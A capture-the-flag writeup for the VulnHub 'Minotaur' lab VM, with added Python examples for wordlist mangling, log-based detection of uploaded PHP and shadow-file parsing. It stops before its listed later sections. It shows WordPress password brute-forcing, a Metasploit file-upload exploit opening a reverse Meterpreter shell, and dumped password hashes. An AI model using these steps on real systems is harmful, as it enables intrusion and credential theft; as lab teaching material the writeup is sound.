Minotaur VulnHub Writeup

  1. Hints
  2. Initial discovery
  3. FTP
  4. Apache
  5. Wordpress
  6. Custom Wordlist
  7. Enter John
  8. Metasploit
  9. The return of John
  10. heffer
  11. minotaur
  12. Conclusion

This image is brought to us by Robert Winkel, and is named Minotaur.

Hints

Reading the description for this image, we find the following two hints.

  1. This CTF has a couple of fairly heavy password cracking challenges, and some red herrings.
  2. One password you will need is not on rockyou.txt or any other wordlist you may have out there. So you need to think of a way to generate it yourself.

Initial discovery

Ok, moving on. I had trouble finding the machine on my host-only network, but after running an nmap scan for port 80 across the subnet, I came across our target. I then ran a more thorough scan against it.

$ nmap -T4 -A -v -p0-65535 192.168.56.223

Starting Nmap 6.47 ( http://nmap.org ) at 2016-04-14 13:47 EDT
NSE: Loaded 118 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 13:47
Scanning 192.168.56.223 [1 port]
Completed ARP Ping Scan at 13:47, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:47
Completed Parallel DNS resolution of 1 host. at 13:47, 0.02s elapsed
Initiating SYN Stealth Scan at 13:47
Scanning 192.168.56.223 [65536 ports]
Discovered open port 22/tcp on 192.168.56.223
Discovered open port 80/tcp on 192.168.56.223
Discovered open port 2020/tcp on 192.168.56.223
Completed SYN Stealth Scan at 13:47, 5.45s elapsed (65536 total ports)
Initiating Service scan at 13:47
Scanning 3 services on 192.168.56.223
Completed Service scan at 13:47, 11.01s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.56.223
NSE: Script scanning 192.168.56.223.
Initiating NSE at 13:47
Completed NSE at 13:47, 0.17s elapsed
Nmap scan report for 192.168.56.223
Host is up (0.00036s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     (protocol 2.0)
| ssh-hostkey:
|   1024 ed:74:0c:c9:21:c4:58:47:d4:02:89:c7:e5:3e:09:18 (DSA)
|   2048 0c:4b:a8:24:7e:fc:cd:8a:b1:9f:87:dd:9d:06:30:05 (RSA)
|_  256 40:9b:fe:f9:82:41:17:93:a2:96:34:25:1c:53:bb:ae (ECDSA)
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-methods: OPTIONS GET HEAD POST
|_http-title: Apache2 Ubuntu Default Page: It works
2020/tcp open  ftp     vsftpd 2.0.8 or later
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port22-TCP:V=6.47%I=7%D=4/14%Time=570FD7A2%P=i686-pc-linux-gnu%r(NULL,2
SF:9,"SSH-2\.0-OpenSSH_6\.6\.1p1\x20Ubuntu-2ubuntu2\r\n");
MAC Address: 08:00:27:75:F8:9D (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.11 - 3.14
Uptime guess: 0.001 days (since Thu Apr 14 13:45:32 2016)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=253 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: minotaur

TRACEROUTE
HOP RTT     ADDRESS
1   0.37 ms 192.168.56.223

NSE: Script Post-scanning.
Initiating NSE at 13:47
Completed NSE at 13:47, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.77 seconds
           Raw packets sent: 65559 (2.885MB) | Rcvd: 65554 (2.623MB)

So we've got an SSH server on port 22, an Apache server on port 80, and an FTP server on port 2020 with anonymous login enabled.

FTP

I log in to the FTP server anonymously, but come up dry: the directory is empty.

$ ftp
ftp> open 192.168.56.223 2020
Connected to 192.168.56.223.
220 Welcome to minotaur FTP service.
Name (192.168.56.223:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -lah
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        114          4096 May 18  2015 .
drwxr-xr-x    2 0        114          4096 May 18  2015 ..

NEXT!

Apache

The root of the Apache server just returns the default page for an Ubuntu install. I switch to dirsearch to brute-force common directory and file names. I first run it with the default wordlist, and then switch to the system dictionary as an alternative wordlist.

$ python3 dirsearch.py -u192.168.56.223 -ephp -w /usr/share/dict/american-english

 _|. _ _  _  _  _ _|_    v0.3.6
(_||| _) (/_(_|| (_| )

Extensions: php | Threads: 10 | Wordlist size: 99171

Error Log: /root/dirsearch/logs/errors-16-04-14_13-49-38.log

Target: 192.168.56.223

[13:49:38] Starting:
[13:50:34] 301 -  314B  - /bull  ->  http://192.168.56.223/bull/

Great, we've got a single hit.

Wordpress

Visiting the URL, we are presented with a rather bullish blog. I fire up wpscan in order to enumerate as much as I can.

$ wpscan --url 192.168.56.223/bull/ -r --enumerate u --enumerate p --enumerate t --enumerate tt
_______________________________________________________________
       __          _______   _____                  
       \ \        / /  __ \ / ____|                 
        \ \  /\  / /| |__) | (___   ___  __ _ _ __  
         \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
          \  /\  /  | |     ____) | (__| (_| | | | |
           \/  \/   |_|    |_____/ \___|\__,_|_| |_|

       WordPress Security Scanner by the WPScan Team
                      Version 2.7
         Sponsored by Sucuri - https://sucuri.net
  @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://192.168.56.223/bull/
[+] Started: Thu Apr 14 13:52:50 2016

[!] The WordPress 'http://192.168.56.223/bull/readme.html' file exists exposing a version number
[+] Interesting header: SERVER: Apache/2.4.7 (Ubuntu)
[+] Interesting header: X-POWERED-BY: PHP/5.5.9-1ubuntu4.6
[+] XML-RPC Interface available under: http://192.168.56.223/bull/xmlrpc.php
[i] This may allow the GHOST vulnerability to be exploited, please see: https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
[!] Upload directory has directory listing enabled: http://192.168.56.223/bull/wp-content/uploads/

[+] WordPress version 4.2.2 identified from meta generator
[!] 12 vulnerabilities identified from the version number

[!] Title: WordPress <= 4.2.2 - Authenticated Stored Cross-Site Scripting (XSS)
   Reference: https://wpvulndb.com/vulnerabilities/8111
   Reference: https://wordpress.org/news/2015/07/wordpress-4-2-3/
   Reference: https://twitter.com/klikkioy/status/624264122570526720
   Reference: https://klikki.fi/adv/wordpress3.html
   Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5622
   Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5623
[i] Fixed in: 4.2.3

[!] Title: WordPress <= 4.2.3 - wp_untrash_post_comments SQL Injection
   Reference: https://wpvulndb.com/vulnerabilities/8126
   Reference: https://github.com/WordPress/WordPress/commit/70128fe7605cb963a46815cf91b0a5934f70eff5
   Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2213
[i] Fixed in: 4.2.4

[!] Title: WordPress <= 4.2.3 - Timing Side Channel Attack
   Reference: https://wpvulndb.com/vulnerabilities/8130
   Reference: https://core.trac.wordpress.org/changeset/33536
   Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5730
[i] Fixed in: 4.2.4

[!] Title: WordPress <= 4.2.3 - Widgets Title Cross-Site Scripting (XSS)
   Reference: https://wpvulndb.com/vulnerabilities/8131
   Reference: https://core.trac.wordpress.org/changeset/33529
   Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5732
[i] Fixed in: 4.2.4

[!] Title: WordPress <= 4.2.3 - Nav Menu Title Cross-Site Scripting (XSS)
   Reference: https://wpvulndb.com/vulnerabilities/8132
   Reference: https://core.trac.wordpress.org/changeset/33541
   Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5733
[i] Fixed in: 4.2.4

[!] Title: WordPress <= 4.2.3 - Legacy Theme Preview Cross-Site Scripting (XSS)
   Reference: https://wpvulndb.com/vulnerabilities/8133
   Reference: https://core.trac.wordpress.org/changeset/33549
   Reference: https://blog.sucuri.net/2015/08/persistent-xss-vulnerability-in-wordpress-explained.html
   Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5734
[i] Fixed in: 4.2.4

[!] Title: WordPress <= 4.3 - Authenticated Shortcode Tags Cross-Site Scripting (XSS)
   Reference: https://wpvulndb.com/vulnerabilities/8186
   Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
   Reference: http://blog.checkpoint.com/2015/09/15/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-iii-ultimatum/
   Reference: http://blog.knownsec.com/2015/09/wordpress-vulnerability-analysis-cve-2015-5714-cve-2015-5715/
   Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5714
[i] Fixed in: 4.2.5

[!] Title: WordPress <= 4.3 - User List Table Cross-Site Scripting (XSS)
   Reference: https://wpvulndb.com/vulnerabilities/8187
   Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
   Reference: https://github.com/WordPress/WordPress/commit/f91a5fd10ea7245e5b41e288624819a37adf290a
   Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7989
[i] Fixed in: 4.2.5

[!] Title: WordPress <= 4.3 - Publish Post and Mark as Sticky Permission Issue
   Reference: https://wpvulndb.com/vulnerabilities/8188
   Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
   Reference: http://blog.checkpoint.com/2015/09/15/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-iii-ultimatum/
   Reference: http://blog.knownsec.com/2015/09/wordpress-vulnerability-analysis-cve-2015-5714-cve-2015-5715/
   Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5715
[i] Fixed in: 4.2.5

[!] Title: WordPress  3.7-4.4 - Authenticated Cross-Site Scripting (XSS)
   Reference: https://wpvulndb.com/vulnerabilities/8358
   Reference: https://wordpress.org/news/2016/01/wordpress-4-4-1-security-and-maintenance-release/
   Reference: https://github.com/WordPress/WordPress/commit/7ab65139c6838910426567849c7abed723932b87
   Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1564
[i] Fixed in: 4.2.6

[!] Title: WordPress 3.7-4.4.1 - Local URIs Server Side Request Forgery (SSRF)
   Reference: https://wpvulndb.com/vulnerabilities/8376
   Reference: https://wordpress.org/news/2016/02/wordpress-4-4-2-security-and-maintenance-release/
   Reference: https://core.trac.wordpress.org/changeset/36435
   Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2222
[i] Fixed in: 4.2.7

[!] Title: WordPress 3.7-4.4.1 - Open Redirect
   Reference: https://wpvulndb.com/vulnerabilities/8377
   Reference: https://wordpress.org/news/2016/02/wordpress-4-4-2-security-and-maintenance-release/
   Reference: https://core.trac.wordpress.org/changeset/36444
   Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2221
[i] Fixed in: 4.2.7

[+] WordPress theme in use: twentyfourteen - v1.4

[+] Name: twentyfourteen - v1.4
|  Location: http://192.168.56.223/bull/wp-content/themes/twentyfourteen/
|  Style URL: http://192.168.56.223/bull/wp-content/themes/twentyfourteen/style.css
|  Theme Name: Twenty Fourteen
|  Theme URI: https://wordpress.org/themes/twentyfourteen/
|  Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern des...
|  Author: the WordPress team
|  Author URI: https://wordpress.org/

[+] Enumerating installed plugins  ...

  Time: 00:00:02 <====================================================================================================> (2012 / 2012) 100.00% Time: 00:00:02

[+] We found 2 plugins:

[+] Name: akismet - v3.1.1
|  Location: http://192.168.56.223/bull/wp-content/plugins/akismet/
|  Readme: http://192.168.56.223/bull/wp-content/plugins/akismet/readme.txt

[!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)
   Reference: https://wpvulndb.com/vulnerabilities/8215
   Reference: http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/
   Reference: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
[i] Fixed in: 3.1.5

[+] Name: slideshow-gallery - v1.4.6
|  Location: http://192.168.56.223/bull/wp-content/plugins/slideshow-gallery/
|  Readme: http://192.168.56.223/bull/wp-content/plugins/slideshow-gallery/readme.txt
[!] Directory listing is enabled: http://192.168.56.223/bull/wp-content/plugins/slideshow-gallery/

[!] Title: Slideshow Gallery < 1.4.7 Arbitrary File Upload
   Reference: https://wpvulndb.com/vulnerabilities/7532
   Reference: http://seclists.org/bugtraq/2014/Sep/1
   Reference: http://packetstormsecurity.com/files/131526/
   Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-5460
   Reference: http://www.rapid7.com/db/modules/exploit/unix/webapp/wp_slideshowgallery_upload
   Reference: http://www.exploit-db.com/exploits/34681/
   Reference: http://www.exploit-db.com/exploits/34514/
[i] Fixed in: 1.4.7

[!] Title: Tribulant Slideshow Gallery <= 1.5.3 - Arbitrary file upload & Cross-Site Scripting (XSS)
   Reference: https://wpvulndb.com/vulnerabilities/8263
   Reference: http://cinu.pl/research/wp-plugins/mail_5954cbf04cd033877e5415a0c6fba532.html
   Reference: http://blog.cinu.pl/2015/11/php-static-code-analysis-vs-top-1000-wordpress-plugins.html
[i] Fixed in: 1.5.3.4

[+] Enumerating installed themes  ...

  Time: 00:00:00 <======================================================================================================> (768 / 768) 100.00% Time: 00:00:00

[+] We found 1 themes:

[+] Name: twentyfourteen - v1.4
|  Location: http://192.168.56.223/bull/wp-content/themes/twentyfourteen/
|  Style URL: http://192.168.56.223/bull/wp-content/themes/twentyfourteen/style.css
|  Theme Name: Twenty Fourteen
|  Theme URI: https://wordpress.org/themes/twentyfourteen/
|  Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern des...
|  Author: the WordPress team
|  Author URI: https://wordpress.org/

[+] Enumerating timthumb files ...

  Time: 00:00:02 <====================================================================================================> (2539 / 2539) 100.00% Time: 00:00:02

[+] No timthumb files found

[+] Enumerating usernames ...
[+] Identified the following 1 user/s:
   +----+-------+-------+
   | Id | Login | Name  |
   +----+-------+-------+
   | 1  | bully | bully |
   +----+-------+-------+

[+] Finished: Thu Apr 14 13:53:09 2016
[+] Requests Done: 5484
[+] Memory used: 8.711 MB
[+] Elapsed time: 00:00:18

So we've got a couple of outdated plugins, one of them with an authenticated file upload vulnerability. In order to take advantage of it, we need the password for the bully user.

After trying a few common passwords without luck, I take a stab in the dark and assume this is the password the hint says we need to crack.

Custom Wordlist

The hint we read earlier alludes to needing to generate our own wordlist.

I use the cewl tool to generate a wordlist from the website content, and run this against the installation with wpscan.

$ cewl -w words.txt http://192.168.56.223/bull/
CeWL 5.0 Robin Wood (robin@digininja.org) (www.digininja.org)

$ wpscan --username bully --url http://192.168.56.223/bull/ --wordlist words.txt --threads 10
...snip...
[+] Starting the password brute forcer
  Brute Forcing 'bully' Time: 00:00:09 <================================================================================= > (481 / 483) 99.58%  ETA: 00:00:00

  +----+-------+------+----------+
  | Id | Login | Name | Password |
  +----+-------+------+----------+
  |    | bully |      |          |
  +----+-------+------+----------+

[+] Finished: Thu Apr 14 13:59:21 2016
[+] Requests Done: 625
[+] Memory used: 2.805 MB
[+] Elapsed time: 00:00:10

Shucks - no hits. I search for any articles on generating custom word lists with cewl, and come across this great article by NetSec.

Enter John

Following the article above, we generate a wordlist with a minimum word length of 6, and then use John the Ripper to apply its great ruleset, resulting in a list of mutated passwords.

$ cewl -w words.txt -m 6 http://192.168.56.223/bull/
CeWL 5.0 Robin Wood (robin@digininja.org) (www.digininja.org)

$ john --wordlist=words.txt --rules --stdout > words-john.txt
words: 11258  time: 0:00:00:00 DONE (Thu Apr 14 14:06:33 2016)  w/s: 375266  current: Receiving

Next, I fire this off to wpscan again.

$ wpscan --username bully --url http://192.168.56.223/bull/ --wordlist words-john.txt --threads 10
[+] Starting the password brute forcer
 Brute Forcing 'bully' Time: 00:03:20 <======================================================================        > (10316 / 11259) 91.62%  ETA: 00:00:18
 [SUCCESS] Login : bully Password : Bighornedbulls


 +----+-------+------+----------------+
 | Id | Login | Name | Password       |
 +----+-------+------+----------------+
 |    | bully |      | Bighornedbulls |
 +----+-------+------+----------------+

[+] Finished: Thu Apr 14 14:10:11 2016
[+] Requests Done: 10461
[+] Memory used: 3.039 MB
[+] Elapsed time: 00:03:21

Awesome - we have a valid login!
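To make the two-step trick concrete, here is an added Python sketch (not code from the writeup, from CeWL or from John the Ripper) that reproduces it in miniature: pull words of at least six characters out of page text, then apply a handful of John-style mangling rules to each. The page text and the rule subset are constructed for this example; the capitalize rule is what turns a lowercase site word into a password of the Bighornedbulls shape. The last function turns the same logic around for the defender, as a password-policy check that rejects passwords derivable from your own site's content.

```python
import re
from typing import Iterator, List, Optional

# Constructed stand-in for the blog's HTML; the writeup ran CeWL against
# http://192.168.56.223/bull/ instead of this snippet.
SAMPLE_PAGE_TEXT = """
<html><body>
<h1>The Bull Blog</h1>
<p>Welcome to the home of the bighornedbulls, where every minotaur
is welcome. Receiving visitors daily in the labyrinth.</p>
</body></html>
"""


def extract_words(text: str, min_len: int = 6) -> List[str]:
    """Strip tags and keep unique alphabetic words of at least min_len
    characters, in first-seen order (roughly what 'cewl -m 6' does)."""
    plain = re.sub(r"<[^>]+>", " ", text)
    seen: List[str] = []
    for word in re.findall(r"[A-Za-z]+", plain):
        if len(word) >= min_len and word not in seen:
            seen.append(word)
    return seen


def mangle(word: str) -> Iterator[str]:
    """Apply a small, constructed subset of John-style word rules:
    case variants, reversal, and common numeric/symbol suffixes."""
    for base in (word, word.lower(), word.upper(), word.capitalize()):
        yield base
        yield base[::-1]
        for suffix in ("1", "123", "!", "2015"):
            yield base + suffix
        for digit in range(10):
            yield base + str(digit)


def build_wordlist(text: str, min_len: int = 6) -> List[str]:
    """Equivalent of 'cewl ... | john --rules --stdout': every mutation of
    every site word, duplicates removed, order preserved."""
    out: List[str] = []
    seen = set()
    for word in extract_words(text, min_len):
        for candidate in mangle(word):
            if candidate not in seen:
                seen.add(candidate)
                out.append(candidate)
    return out


def derivable_from_site(password: str, text: str, min_len: int = 6) -> Optional[str]:
    """Defensive use: return the site word the password is a simple
    mutation of, or None if it is not derivable this way."""
    for word in extract_words(text, min_len):
        if password in set(mangle(word)):
            return word
    return None


if __name__ == "__main__":
    wordlist = build_wordlist(SAMPLE_PAGE_TEXT)
    print(f"{len(wordlist)} candidates from {len(extract_words(SAMPLE_PAGE_TEXT))} site words")
    print("Bighornedbulls derives from:", derivable_from_site("Bighornedbulls", SAMPLE_PAGE_TEXT))
```

John's real default ruleset is far larger (hundreds of rules, including leetspeak substitutions), which is why the wpscan run above had over 11,000 candidates from a few hundred site words; the point of the sketch is that a policy which only checks rockyou.txt misses exactly this class of password.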

Metasploit

We already know there's a plugin with a file upload vulnerability present, and that Metasploit has a module for it, so let's use the tools at our disposal. I fire up Metasploit and, using the previously discovered login, trigger the exploit.

msf > use exploit/unix/webapp/wp_slideshowgallery_upload
msf exploit(wp_slideshowgallery_upload) > show options

Module options (exploit/unix/webapp/wp_slideshowgallery_upload):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                         yes       The target address
   RPORT        80               yes       The target port
   TARGETURI    /                yes       The base path to the wordpress application
   VHOST                         no        HTTP server virtual host
   WP_PASSWORD                   yes       Valid password for the provided username
   WP_USER                       yes       A valid username


Exploit target:

   Id  Name
   --  ----
   0   WP SlideShow Gallery 1.4.6


msf exploit(wp_slideshowgallery_upload) > set RHOST 192.168.56.223
RHOST => 192.168.56.223
msf exploit(wp_slideshowgallery_upload) > set TARGETURI /bull/
TARGETURI => /bull/
msf exploit(wp_slideshowgallery_upload) > set WP_USER bully
WP_USER => bully
msf exploit(wp_slideshowgallery_upload) > set WP_PASSWORD Bighornedbulls
WP_PASSWORD => Bighornedbulls
msf exploit(wp_slideshowgallery_upload) > run

[*] Started reverse handler on 192.168.56.103:4444
[*] 192.168.56.223:80 - Trying to login as bully
[*] 192.168.56.223:80 - Trying to upload payload
[*] 192.168.56.223:80 - Uploading payload
[*] 192.168.56.223:80 - Calling uploaded file ieqercms.php
[*] Sending stage (32461 bytes) to 192.168.56.223
[*] Meterpreter session 1 opened (192.168.56.103:4444 -> 192.168.56.223:57315) at 2016-04-14 14:11:55 -0400
[+] Deleted ieqercms.php
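From the defender's side, the run above leaves a recognisable trace in the web server log: a PHP file lands under wp-content/uploads/ and is then requested directly (the module calls its uploaded ieqercms.php and deletes it afterwards, as the output shows). The following Python is an added example, not part of the writeup or of the Metasploit module, that scans Apache combined-format access log lines for requests that execute PHP from the uploads tree. The log lines are constructed to mirror the session above; the exact upload sub-directory the real module writes to is an assumption.

```python
import re
from typing import Dict, List, NamedTuple

# Constructed Apache combined-log lines modelled on the exploit run in the
# writeup (attacker 192.168.56.103, uploaded file ieqercms.php). The
# slideshow-gallery upload path is assumed for this example.
SAMPLE_ACCESS_LOG = """\
192.168.56.103 - - [14/Apr/2016:14:11:50 -0400] "POST /bull/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.56.103 - - [14/Apr/2016:14:11:52 -0400] "POST /bull/wp-admin/admin.php?page=slideshow-gallery&method=save HTTP/1.1" 200 4521 "-" "Mozilla/5.0"
192.168.56.103 - - [14/Apr/2016:14:11:55 -0400] "GET /bull/wp-content/uploads/slideshow-gallery/ieqercms.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.56.50 - - [14/Apr/2016:14:12:10 -0400] "GET /bull/wp-content/uploads/2015/05/bull.jpg HTTP/1.1" 200 81234 "-" "Mozilla/5.0"
192.168.56.50 - - [14/Apr/2016:14:12:11 -0400] "GET /bull/wp-content/plugins/akismet/akismet.js HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Apache "combined" format: ip ident user [time] "method path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# PHP should never execute from the media upload tree; any PHP-like
# extension requested there is suspect.
UPLOAD_PHP_RE = re.compile(r"/wp-content/uploads/.*\.(?:php\d?|phtml|phar)(?:$|[?/])", re.I)


class Hit(NamedTuple):
    ip: str
    time: str
    path: str
    status: str


def parse_line(line: str) -> Dict[str, str]:
    """Parse one combined-format line into named fields; raise on junk."""
    m = LOG_RE.match(line)
    if not m:
        raise ValueError(f"unparseable log line: {line!r}")
    return m.groupdict()


def find_uploaded_php_execution(log_text: str) -> List[Hit]:
    """Return every request that executes a PHP-like file from uploads/."""
    hits: List[Hit] = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        path = rec["path"].split("?", 1)[0]   # drop the query string
        if UPLOAD_PHP_RE.search(path):
            hits.append(Hit(rec["ip"], rec["time"], path, rec["status"]))
    return hits


def suspicious_sources(log_text: str) -> List[str]:
    """Distinct client IPs that triggered the rule, in first-seen order."""
    seen: List[str] = []
    for hit in find_uploaded_php_execution(log_text):
        if hit.ip not in seen:
            seen.append(hit.ip)
    return seen


if __name__ == "__main__":
    for hit in find_uploaded_php_execution(SAMPLE_ACCESS_LOG):
        print(f"[!] {hit.time} {hit.ip} executed {hit.path} (HTTP {hit.status})")
```

A hit here is worth an alert on its own, because a correctly hardened WordPress install denies PHP execution under wp-content/uploads/ at the web-server level, so the request should have returned 403 rather than 200; the 200 with a zero-byte body in the constructed sample is the uploaded stager handing off to the reverse handler.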

Next, I open up a shell and find our first flag.

meterpreter > shell
Process 3732 created.
Channel 1 created.
cd /var/www/html
ls -lah
total 28K
drwxr-xr-x 3 www-data www-data 4.0K May 27  2015 .
drwxr-xr-x 3 root     root     4.0K May 14  2015 ..
drwxr-xr-x 5 www-data www-data 4.0K May 14  2015 bull
-rw------- 1 www-data www-data   47 May 27  2015 flag.txt
-rw-r--r-- 1 www-data www-data  12K May 14  2015 index.html
cat flag.txt
Oh, lookey here. A flag!
Th15 15 @N 3@5y f1@G!

After a little digging, I find something rather interesting in /tmp.

cd /tmp
ls -lah
total 16K
drwxrwxrwt  2 root root     4.0K Apr 15 05:39 .
drwxr-xr-x 21 root root     4.0K May 14  2015 ..
-rw-r-----  1 root www-data  121 May 27  2015 flag.txt
-rw-r-----  1 root www-data 1.2K May 27  2015 shadow.bak
cat flag.txt
That shadow.bak file is probably useful, hey?
Also, you found a flag!
My m1L|<$|-|@|<3 br1|\|G$ @11 t3h b0y$ 2 t3h y@R|)
cat shadow.bak
root:$6$15/OlfJP$h70tk3qikcf.kfwlGpYT7zfFg.cRzlJMlbVDSj3zCg4967ZXG0JzN/6oInrnvGf7AZaJFE2qJdBAOc/3AyeGX.:16569:0:99999:7:::
daemon:*:16484:0:99999:7:::
bin:*:16484:0:99999:7:::
sys:*:16484:0:99999:7:::
sync:*:16484:0:99999:7:::
games:*:16484:0:99999:7:::
man:*:16484:0:99999:7:::
lp:*:16484:0:99999:7:::
mail:*:16484:0:99999:7:::
news:*:16484:0:99999:7:::
uucp:*:16484:0:99999:7:::
proxy:*:16484:0:99999:7:::
www-data:*:16484:0:99999:7:::
backup:*:16484:0:99999:7:::
list:*:16484:0:99999:7:::
irc:*:16484:0:99999:7:::
gnats:*:16484:0:99999:7:::
nobody:*:16484:0:99999:7:::
libuuid:!:16484:0:99999:7:::
syslog:*:16484:0:99999:7:::
mysql:!:16569:0:99999:7:::
messagebus:*:16569:0:99999:7:::
landscape:*:16569:0:99999:7:::
sshd:*:16569:0:99999:7:::
minotaur:$6$3qaiXwrS$1Ctbj1UPpzKjWSgpIaUH0PovtO2Ar/IshWUe4tIUrJf8VlbIIijxdu4xHsXltA0mFavbo701X9.BG/fVIPD35.:16582:0:99999:7:::
ftp:*:16573:0:99999:7:::
heffer:$6$iH6pqgzM$3nJ00ToM38a.qLqcW8Yv0pdRiO/fXOvNv03rBzv./E0TO4B8y.QF/PNZ2JrghQTZomdVl3Zffb/MkWrFovWUi/:16582:0:99999:7:::
h0rnbag:$6$nlapGOqY$Hp5VHWq388mVQemkiJA2U1qLI.rZAFzxCw7ivfyglRNgZ6mx68sE1futUy..m7dYJRQRUWEpm3XKihXPB9Akd1:16582:0:99999:7:::

It looks like we're not finished with John yet...
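What makes shadow.bak valuable is both where it sits and what it contains: the copy is readable by the www-data group, and only the accounts with a real $6$ hash can be cracked offline; the rest are locked with * or !. The Python below is an added example, not from the writeup, that parses shadow-format lines (the sample is a subset of the shadow.bak printed above) and reports which accounts carry crackable hashes, which hash algorithm they use, and whether a given mode/owner/group exposes such a file to anyone besides root.

```python
from dataclasses import dataclass
from typing import List, Optional

# Subset of the shadow.bak lines printed in the writeup, hashes as shown there.
SAMPLE_SHADOW = """\
root:$6$15/OlfJP$h70tk3qikcf.kfwlGpYT7zfFg.cRzlJMlbVDSj3zCg4967ZXG0JzN/6oInrnvGf7AZaJFE2qJdBAOc/3AyeGX.:16569:0:99999:7:::
daemon:*:16484:0:99999:7:::
libuuid:!:16484:0:99999:7:::
mysql:!:16569:0:99999:7:::
minotaur:$6$3qaiXwrS$1Ctbj1UPpzKjWSgpIaUH0PovtO2Ar/IshWUe4tIUrJf8VlbIIijxdu4xHsXltA0mFavbo701X9.BG/fVIPD35.:16582:0:99999:7:::
heffer:$6$iH6pqgzM$3nJ00ToM38a.qLqcW8Yv0pdRiO/fXOvNv03rBzv./E0TO4B8y.QF/PNZ2JrghQTZomdVl3Zffb/MkWrFovWUi/:16582:0:99999:7:::
"""

# crypt(3) hash prefixes mapped to algorithm names
ALGORITHMS = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
              "5": "sha256crypt", "6": "sha512crypt", "7": "scrypt", "y": "yescrypt"}


@dataclass
class ShadowEntry:
    user: str
    password: str       # second field: hash, '*', '!' or empty
    last_change: int    # days since the epoch
    max_days: int       # maximum password age

    @property
    def state(self) -> str:
        if self.password == "":
            return "empty"          # login with no password at all
        if self.password.startswith(("*", "!")):
            return "locked"
        return "hashed"

    @property
    def algorithm(self) -> Optional[str]:
        if self.state != "hashed":
            return None
        if not self.password.startswith("$"):
            return "descrypt"       # legacy 13-character DES crypt
        return ALGORITHMS.get(self.password.split("$")[1], "unknown")


def parse_shadow(text: str) -> List[ShadowEntry]:
    """Parse shadow(5) lines; each has nine colon-separated fields."""
    entries: List[ShadowEntry] = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 9:
            raise ValueError(f"malformed shadow line for {fields[0]!r}")
        entries.append(ShadowEntry(fields[0], fields[1],
                                   int(fields[2] or 0), int(fields[4] or 0)))
    return entries


def crackable(entries: List[ShadowEntry]) -> List[str]:
    """Accounts whose hashes a leaked copy of the file exposes to offline cracking."""
    return [e.user for e in entries if e.state == "hashed"]


def file_exposure(mode: str, owner: str, group: str) -> Optional[str]:
    """Given an ls -l mode string plus ownership, say who besides root can
    read the file, or None if nobody can. A shadow copy should be root:root
    0600 (or root:shadow 0640 on Debian-style systems)."""
    if len(mode) != 10:
        raise ValueError("expected a 10-character ls -l mode string")
    if mode[7] == "r":
        return "world-readable"
    if mode[4] == "r" and group not in ("root", "shadow"):
        return f"readable by group {group}"
    if owner != "root":
        return f"owned by {owner}"
    return None


if __name__ == "__main__":
    entries = parse_shadow(SAMPLE_SHADOW)
    for e in entries:
        print(f"{e.user:10} {e.state:7} {e.algorithm or '-':12} max_days={e.max_days}")
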